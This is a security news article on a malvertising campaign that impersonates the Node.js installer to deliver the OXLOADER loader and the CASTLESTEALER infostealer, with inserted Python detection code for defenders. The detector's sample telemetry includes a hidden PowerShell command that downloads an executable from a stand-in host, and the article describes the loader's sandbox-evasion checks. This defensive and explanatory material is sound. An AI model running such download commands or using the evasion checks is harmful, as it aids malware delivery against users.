Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware

In Cybersecurity News - Original news source: cybersecuritynews.com, by Blog Writer


Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer.

The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single click on what appears to be a legitimate sponsored search result.

The attack takes advantage of something millions of people do every day: searching for software online and trusting the top results. In this case, the threat actors set up a malicious landing page built to look like the official Node.js site.

When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, making it much harder for security tools to flag it.

Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers. 

Elastic Security Labs said in a report shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.

The campaign ran through Google Ads, and the malicious advertiser account was registered under a verified name linked to Ukraine.

The last time the ad appeared was April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns entirely.

What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.

Advertiser’s profile on Google Ads Transparency Center (Source – Elastic)

The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems.

Security teams should treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites.

Hackers Impersonate Node.js Installer in Google Ads

The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js environment.

Batch script downloading and launching OXLOADER (Source – Elastic)

From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.

The batch script goes a step further by displaying a convincing fake software installation wizard, giving the victim no reason to suspect anything is wrong.

Behind that interface, it is silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access. The entire experience is designed to feel like a routine software install.
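A defender-side triage of the chain just described, as an added example that is not from Elastic's report: it runs over constructed process-creation events (the field names and the example.invalid URL are assumptions; the .bat filename is the one the report lists) and links the .bat, the PowerShell download, and the elevated follow-on process.

```python
"""Triage constructed process events for the delivery chain described above: a .bat launched
from a download location spawns PowerShell with a download primitive, and an elevated
process then runs from a user-writable path. Added example; the schema is assumed."""
import re
from collections import defaultdict

# PowerShell tokens that fetch content from the network.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|net\.webclient|start-bitstransfer", re.I)
# Locations a non-admin user (or a script running as that user) can write to.
USER_WRITABLE_RE = re.compile(r"\\(downloads|temp|appdata)\\", re.I)
BAT_RE = re.compile(r'([A-Za-z]:\\[^"]+?\.bat)', re.I)

# Constructed sample telemetry, not real EDR output; field names are assumptions.
# The .bat filename is the one the report lists for the OXLOADER launcher.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe", "integrity": "Medium"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\Bild0erSetup.bat"', "integrity": "Medium"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest https://example.invalid/s -OutFile C:\Users\alice\AppData\Local\Temp\node-setup.exe"',
     "integrity": "Medium"},
    # UAC-elevated processes are reparented under the AppInfo svchost, so ppid is not the .bat's cmd.exe.
    {"pid": 400, "ppid": 900, "image": r"C:\Users\alice\AppData\Local\Temp\node-setup.exe", "cmdline": "node-setup.exe", "integrity": "High"},
    # Benign: a developer's build script in a project directory also downloads via PowerShell.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\dev\build.bat", "integrity": "Medium"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://example.invalid/pkg", "integrity": "Medium"},
]

def find_oxloader_chains(events):
    """Return one (bat_cmd_pid, powershell_pid, [elevated_pids]) tuple per matching chain."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    # Stage 3 candidates: High-integrity processes whose image lives in a user-writable path.
    elevated = [e["pid"] for e in events if e["integrity"] == "High" and USER_WRITABLE_RE.search(e["image"])]
    findings = []
    for e in events:
        if not e["image"].lower().endswith("cmd.exe"):
            continue
        m = BAT_RE.search(e["cmdline"])                        # Stage 1: cmd.exe running a .bat ...
        if not m or not USER_WRITABLE_RE.search(m.group(1)):    # ... from Downloads, Temp or AppData
            continue
        for ps in children[e["pid"]]:                           # Stage 2: child PowerShell that downloads
            if ps["image"].lower().endswith("powershell.exe") and DOWNLOAD_RE.search(ps["cmdline"]):
                findings.append((e["pid"], ps["pid"], elevated))
    return findings
```

The benign build-script pair (pids 500/600) is deliberately not matched because its .bat lives outside a user-writable download location; tune USER_WRITABLE_RE to your estate's actual download paths.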

Elastic Defend alerts triggered upon script execution (Source – Elastic)

A second variant of OXLOADER was discovered on May 13, 2026, this time masquerading as a Node.js installer binary rather than the API Monitor tool the first sample impersonated, though the underlying loader mechanism was identical.

Researchers noted that the file retained the word “node” in its filename, likely to maintain the lure theme the campaign relied on throughout.

How OXLOADER Evades Detection

OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine.

Infection chain execution graph (Source – Elastic)

These include checking for at least three CPU cores, at least 3 GB of physical RAM and a display refresh rate above 20 Hz, and verifying that the system is neither located in a CIS region nor configured for the Russian language.

The loader also uses sophisticated obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult.

It hides malicious code inside the Windows .reloc section, a space legitimate programs never use for executable instructions, and unpacks itself in memory using self-modifying decryption routines.

The final payload, CASTLESTEALER, is then delivered entirely in memory using an open-source shellcode generator called DonutLoader, leaving almost no trace on disk.
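As an added example (not Elastic's tooling), a header-only PE triage that flags the .reloc traits just described: a .reloc section carrying executable or code flags, or the entry point falling inside it. The sample images are constructed in memory by build_pe; the section layouts and sizes are assumptions, not the loader's actual values.

```python
"""Flag PE section-table traits matching the .reloc abuse described above: an executable
.reloc section, or the entry point inside it. Added example, not Elastic's tooling."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def parse_sections(pe):
    """Return (AddressOfEntryPoint, [section dicts]) from raw PE bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    entry = struct.unpack_from("<I", pe, e_lfanew + 24 + 16)[0]  # AddressOfEntryPoint
    off = e_lfanew + 24 + opt_size                               # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, _, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, pe, off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "size": max(vsize, rawsize), "chars": chars})
    return entry, sections

def reloc_findings(pe):
    """Triage signals for .reloc; some packers also trip these, so treat them as leads, not verdicts."""
    entry, sections = parse_sections(pe)
    out = []
    for s in sections:
        if s["name"] != ".reloc":
            continue
        if s["chars"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE):
            out.append(".reloc marked executable or code")
        if s["va"] <= entry < s["va"] + s["size"]:
            out.append("entry point inside .reloc")
    return out

def build_pe(entry, sections):
    """Construct a header-only PE32+ image for testing (constructed, not a real binary)."""
    opt_size = 0xF0  # only AddressOfEntryPoint is populated in the optional header
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<HBBIIII", 0x20B, 0, 0, 0, 0, 0, entry) + b"\0" * (opt_size - 20)
    hdrs = b"".join(struct.pack(SECTION_FMT, n, vs, va, vs, 0x400, 0, 0, 0, 0, ch) for n, vs, va, ch in sections)
    return dos + coff + opt + hdrs

# Typical layout: code in .text, .reloc as read-only discardable data; entry point in .text.
BENIGN = build_pe(0x1400, [(b".text", 0x2000, 0x1000, 0x60000020), (b".reloc", 0x200, 0x5000, 0x42000040)])
# Layout matching the loader described above: executable .reloc that holds the entry point.
SUSPICIOUS = build_pe(0x5100, [(b".text", 0x2000, 0x1000, 0x60000020), (b".reloc", 0x800, 0x5000, 0xE0000040)])
```

Run reloc_findings over a real sample's bytes (open(path, "rb").read()) to apply the same checks; a hit justifies pulling the file into a sandbox that passes the loader's hardware and locale gates listed above.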

Indicators of Compromise (IoCs):


Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
